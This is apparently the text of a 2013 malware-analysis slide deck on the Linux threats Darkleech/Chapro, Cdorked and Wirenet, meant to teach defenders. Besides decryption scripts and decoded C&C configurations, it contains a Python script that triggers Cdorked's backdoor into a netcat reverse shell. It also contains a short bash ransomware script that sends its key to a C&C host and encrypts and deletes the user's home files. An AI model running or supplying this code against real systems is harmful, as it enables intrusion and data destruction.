Linux malware presentation @r00tbsd Paul Rascagnres Malware.lu - - PowerPoint PPT Presentation

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Malware.lu

July 2013

@r00tbsd – Paul Rascagnères

Linux malware presentation

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Plan

• Presentation
• Darkleech/Chapro
• Cdorked
• Wirenet
• Conclusion

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Presentation

Who am I? Paul Rascangères - @r00tbsd or @malware.lu. Creator and maintener of malware.lu. Malware analysis, Incident Response, Reverse Engineering... Author of “Malware – Identification, analyse et éradication”

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Presentation

Why am I here and why this talk? Some people think that malware don't exist on Linux platform. 4 examples in 2012/2013:

• Darkleech (Apache module)
• Cdorked (Apache server)
• wirenet (Remote Administration Tool)
• gift...

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Plan

• Presentation
• Darkleech/Chapro
• Cdorked
• Wirenet
• Conclusion

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Darkleech/Chapro

First seen The first version was identify in August 2012. How does it work? This malware is an apache module. The module is executed by LoadModule command and defines in the module configuration file. Features:

• inject JavaScript code to redirect users on infected Website
• backdoor

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Darkleech/Chapro

Analysis - module Module file name: mod_[a-z0-9]{3,}_[a-z0-9]{3,}\.so Example: mod_sec2_config.so Module execution: cat /etc/apache2/modules/[VARIOUS].conf LoadModule sec2_config_module modules/mod_sec2_config.so Analysis - Symptoms The malware injects Exploit Kits (JS) on the Web pages:

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Darkleech/Chapro

Analysis - Symptoms

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Darkleech/Chapro

Analysis – Symptoms The redirection is performed by a JavaScript insertion (IFrame):

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Darkleech/Chapro

Analysis – Targets selection The targets selection is performed thanks to the REFERER. C_ARRAY_BAN_USERAGENT: SAFARI YANDEX OPERA CRAWLER FIREFOX JIKE CHROME SPIDER GOOGLEBOT ROBOT SLURP PAPERLIBOT YAHOO SNAPPREVIEWBOT BING BUFFERBOT LINUX MEDIAPARTNERS OPENBSD HATENA MACINTOSH BLUEDRAGON MAC OS WORDPRESS IPHONE XIANGUO ...

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Darkleech/Chapro

Analysis – Reversing The data are encoded in the file:

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Darkleech/Chapro

Analysis – Reversing Several function (symbols) are linked to the encoding:

• 0x17C8 xor_decrypt_string
• 0x17ED xor_encrypt_string
• 0x1800 xor_encrypt

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Darkleech/Chapro

Analysis – Reversing xor_decrypt_string pseudo-C

xor_decrypt_string(A8, Ac, A10, A14) { L00003117(); ebx = ebx + 0x5001; esp = esp - 0xc; Vfffffff4 = A14 + 1; *esp = *( *( *( *(ebx + -300)) + 0xc)); *(ebp - 0x10) = L00002D90(); if(A14 > 0) { ecx = 0; do { edx = 0; eax = 0; edx = 0 >> 0x1f; Ac = Ac / Ac; al = *A10 & 0xff ^ *(Ac % Ac + A8); *( *(ebp - 0x10)) = al; } while(1 != A14); } esi = *(ebp - 0x10); *(esi + A14) = 0; eax = esi; esp = esp + 0xc;}

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Darkleech/Chapro

Analysis – Reversing xor_decrypt_string python implementation:

fd.seek(0x84a0) key = fd.read(23) for s in tab: fd.seek(s['offset']) data = fd.read(s['size']) decrypted = ''.join(chr(ord(c)^ord(k)) for c,k in izip(data, cycle(key))) clear_text = decrypted.split('\x00')[0] print('%s: %s') % (s['name'], clear_text)

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Darkleech/Chapro

Analysis – Reversing

$ python sec2.py "./mod_sec2_config.so" C_MODULE_VERSION: "2012.12.14" C_CC_HOST: "217.23.13.6" C_CC_URI: "/Home/index.php" C_CC_REQUEST_FORMAT: "POST %s HTTP/1.1" Host: "%s" Content-Type: "application/x-www-form-urlencoded" Content-Length:" %i %s" C_MARKER_LEFT: "{{{" C_MARKER_RIGHT: "}}}" C_TMP_DIR: "/" C_LIST_PREF: "sess_" C_COOKIE_NAME: "PHP_SESSION_ID=" C_ARRAY_TAGS_FOR_INJECT: " ＜ /script ＞ ＜ /style ＞ ＜ /head ＞ ＜ /title ＞ ...

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Plan

• Presentation
• Darkleech/Chapro
• Cdorked
• Wirenet
• Conclusion

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Cdorked

Presentation

Unliked it brother Darkleech/Chapro, Cdorked is not an Apache module but a custom

apache server. The malware used a XOR to encrypt strings: fd.seek(0x16B460) # XOR key key = fd.read(24) for i, s in enumerate(tab): fd.seek(s['offset']) data = fd.read(s['size']) decrypted = ''.join(chr(ord(c) ^ ord(k)) for c, k in izip(data, cycle(key))) print('xx%s: %s') % (i, decrypted)

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Cdorked

How to get a shell ? - request

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Cdorked

How to get a shell ? - encryption

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Cdorked

How to get a shell ? - encryption Here is the code: ip = $client_ip key[0] = ( (ip AND 0xFF000000) >> 24 ) + 5 key[1] = ( (ip AND 0xFF0000 ) >> 16 ) + 33 key[2] = ( (ip AND 0xFF00 ) >> 8 ) + 55 key[3] = ( (ip ) ) + 78

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Cdorked

How to get a shell ? - the reverse-shell

import urllib2 import subprocess import os LHOST = '192.168.56.1' LPORT = '4444' RHOST = '192.168.56.101' RPORT = '80' param = ('GET_BACK;%s;%s' % (LHOST, LPORT)).encode('hex') request = 'http://%s:%s/favicon.iso?%s' % (RHOST, RPORT, param) if os.fork(): req = urllib2.Request(request) req.add_header('X-Real-IP', '251.223.201.178') urllib2.urlopen(req) else: subprocess.call(['nc', '-l', LPORT])

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Plan

• Presentation
• Darkleech/Chapro
• Cdorked
• Wirenet
• Conclusion

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Wirenet

Strings obfuscation The attacker used RC4 algorithm to encrypt configuration:

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Wirenet

Strings obfuscation

fp = open(sys.argv[1]) fp.seek(0xf4d8, 0) key = fp.read(16) for c in crypted: rc4 = ARC4.new(key) fp.seek(c['adr']) data = fp.read(c['len']) val = rc4.decrypt(data).split('\x00')[0] print "%s: %s" % (c['name'], val) if c['name'] == 'BoolSettingsByte': for name, o in options.iteritems(): print "%s: %s" % (name, isOption(val, o))

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Wirenet

Strings obfuscation

y0ug@laptop:~$ python decode.py 9a0e765eecc5433af3dc726206ecc56e ConnectionString: 212.7.208.65:4141; ProxyString: - Password: sm0k4s523syst3m523 HostId: LINUX MutexName: vJEewiWD InstallPath: %home%/WIFIADAPT StartupKeyName1: WIFIADAPTER StartupKeyName2: - KeyLoggerFileName: %Home%\.m8d.dat BoolSettingsByte: 237 run_as_daemon: True xinit_start: False install_file: True lock_file?: True keylogger: True single_instance: True desktop_start: True ConnectionType: 001

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Wirenet

Fake C&C

wirenet $ New session 127.0.0.1:52956 wirenet $ session 0 127.0.0.1:52956 LINUX rootbsd @ alien wirenet $ session 0 Switch to session 0 context 127.0.0.1:52956 $ help Undocumented commands: ====================== EOF cred_thunderbird get log_clear mkdir rm shell cp creds help log_get mv screen cred_pidgin exit info ls ps session

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Wirenet

Fake C&C

127.0.0.1:52956 $ info arch: LINUX name: rootbsd @ alien DISTRIB_ID=Ubuntu DISTRIB_RELEASE=12.04 DISTRIB_CODENAME=precise DISTRIB_DESCRIPTION="Ubuntu 12.04.1 LTS" 127.0.0.1:52956 $ shell Shell is start with /bin/sh (EOF to exit) id uid=1000(rootbsd) gid=1000(rootbsd) groups=1000(rootbsd),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),11 8(admin),124(sambashare),1001(bumblebee) Shell is stop

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Wirenet

Fake C&C

wirenet $ New session 127.0.0.1:52956 wirenet $ session 0 127.0.0.1:52956 LINUX rootbsd @ alien wirenet $ session 0 Switch to session 0 context 127.0.0.1:52956 $ help Undocumented commands: ====================== EOF cred_thunderbird get log_clear mkdir rm shell cp creds help log_get mv screen cred_pidgin exit info ls ps session

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Plan

• Presentation
• Darkleech/Chapro
• Cdorked
• Wirenet
• Conclusion

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Gift

Linux is so powerfull... (ransomware for free)

#!/bin/bash passwd=$(openssl rand -hex 64) curl http://www.c-and-c.com/test?$passwd list=$(find $HOME -type f) for i in $(echo $list) do

• penssl aes-256-ecb -in $i -out $i.new -pass pass:$passwd

rm $i done

Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu

Conclusion